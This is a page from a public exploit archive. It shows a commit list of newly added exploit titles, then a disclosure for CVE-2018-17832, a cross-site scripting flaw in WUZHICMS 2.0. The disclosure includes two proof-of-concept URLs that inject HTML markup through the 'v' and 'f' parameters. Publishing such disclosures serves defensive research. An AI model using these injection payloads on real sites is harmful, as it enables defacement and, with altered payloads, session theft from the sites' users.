716ece3cc6
13 changes to exploits/shellcodes Snes9K 0.0.9z - Denial of Service (PoC) Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation H2 Database 1.4.196 - Remote Code Execution ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting Fork CMS 5.4.0 - Cross-Site Scripting Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection Education Website 1.0 - 'subject' SQL Injection Singleleg MLM Software 1.0 - 'msg_id' SQL Injection Binary MLM Software 1.0 - 'pid' SQL Injection Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection WUZHICMS 2.0 - Cross-Site Scripting Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
16 lines
No EOL
570 B
Text
16 lines
No EOL
570 B
Text
# Title: WUZHICMS 2.0 - Cross-Site Scripting
|
|
# Author: Felipe "Renzi" Gabriel
|
|
# Date: 2018-10-01
|
|
# Vendor: http://www.wuzhicms.com
|
|
# Software: WUZHICMS 2.0
|
|
# CVE: CVE-2018-17832
|
|
|
|
# Technical Details & Description:
|
|
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0 web-application.
|
|
# The vulnerability is located in the 'v' and 'f' parameters of the`index.php` action GET method request.
|
|
|
|
# PoC
|
|
|
|
http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
|
|
|
|
http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee> |